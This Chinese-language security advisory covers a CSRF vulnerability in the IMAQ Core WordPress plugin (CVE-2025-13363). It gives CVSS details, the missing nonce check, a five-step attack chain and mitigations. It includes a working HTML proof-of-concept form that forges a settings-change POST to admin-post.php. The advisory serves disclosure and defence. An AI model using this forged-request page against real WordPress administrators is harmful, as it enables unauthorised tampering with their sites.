CVE-2025-13363 WordPress IMAQ Core插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13363

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

IMAQ Core plugin for WordPress

漏洞概述

CVE-2025-13363是WordPress IMAQ Core插件中的一个跨站请求伪造（CSRF）漏洞。该插件是一款用于IMAQ Core的WordPress插件，在1.2.1及之前的所有版本中均存在此安全缺陷。漏洞的根本原因在于插件的URL结构设置更新功能缺少适当的nonce验证机制，这使得攻击者能够构造恶意请求，在未经授权的情况下修改插件的URL结构设置。由于该攻击需要诱导网站管理员执行特定操作（如点击恶意链接），因此需要一定的社会工程学手段。攻击成功后，攻击者可以修改插件配置，可能导致网站功能异常或被用于进一步的攻击活动。此漏洞不影响系统的机密性，但可能对网站完整性造成低程度的影响。

技术细节

IMAQ Core插件在处理URL结构设置更新请求时，未对请求来源进行有效的nonce令牌验证。WordPress通常使用nonce机制来防止CSRF攻击，但该插件的相关功能（AcademixCorePermalink.php第58行附近）缺少这一关键的安全检查。攻击者可以构造一个包含恶意参数的HTTP请求，诱骗已登录的管理员访问。当管理员访问该恶意链接时，浏览器会自动携带其有效的认证cookie向目标网站发送请求。由于服务器无法识别这是一个伪造请求，它会执行攻击者预设的操作（如修改URL结构设置）。攻击的成功依赖于管理员的会话状态和交互行为（点击链接）。CVSS 3.1评分4.3（AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N）反映了该漏洞通过网络发起、复杂度低、无需特殊权限但需要用户交互的特点。

攻击链分析

STEP 1

Step 1

攻击者创建包含恶意表单的网页，该表单指向目标WordPress网站的IMAQ Core插件设置更新端点

STEP 2

Step 2

攻击者通过钓鱼邮件、社交媒体或其他渠道诱骗网站管理员访问恶意网页

STEP 3

Step 3

管理员的浏览器自动向目标网站发送POST请求，由于浏览器自动携带有效的认证cookie，请求被视为合法

STEP 4

Step 4

目标服务器的IMAQ Core插件接收到请求，由于缺少nonce验证，无法识别这是伪造请求

STEP 5

Step 5

插件执行攻击者预设的操作，修改URL结构设置为恶意值，可能导致网站功能异常或被用于进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-13363 -->
<!-- Target: WordPress site with IMAQ Core plugin <= 1.2.1 -->
<!-- This PoC demonstrates how an attacker can change the plugin's URL structure settings -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-13363 CSRF PoC</title>
</head>
<body>
    <h1>IMAQ Core Plugin CSRF Attack</h1>
    <p>Click the button below to execute the CSRF attack:</p>
    
    <!-- Auto-submit form that forges a request to update URL structure settings -->
    <form id="csrfForm" action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST" style="display:none;">
        <!-- IMAQ Core plugin's URL structure update parameters -->
        <input type="hidden" name="action" value="academix_core_permalink_update">
        <input type="hidden" name="academix_permalink" value="malicious-url-structure">
        <input type="hidden" name="academix_permalink_nonce" value="">
    </form>
    
    <button onclick="document.getElementById('csrfForm').submit();">Execute Attack</button>
    
    <script>
        // Auto-submit after page load (for stealthier attack)
        // window.onload = function() { document.getElementById('csrfForm').submit(); };
    </script>
</body>
</html>

<!-- 
Attack Scenario:
1. Attacker creates a malicious page with the above form
2. Attacker tricks WordPress admin into visiting the page
3. Admin's browser sends authenticated request with modified parameters
4. Server processes the request without nonce validation
5. Plugin's URL structure settings are modified
-->

影响范围

IMAQ Core plugin for WordPress <= 1.2.1

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）暂时禁用IMAQ Core插件；2）启用WordPress的CSRF保护插件；3）限制管理员账户的使用，避免从不受信任的链接访问管理后台；4）监控wp-admin目录下的异常POST请求；5）使用Web应用防火墙（WAF）规则阻止可疑的admin-post.php请求；6）考虑使用双因素认证增强管理员账户安全。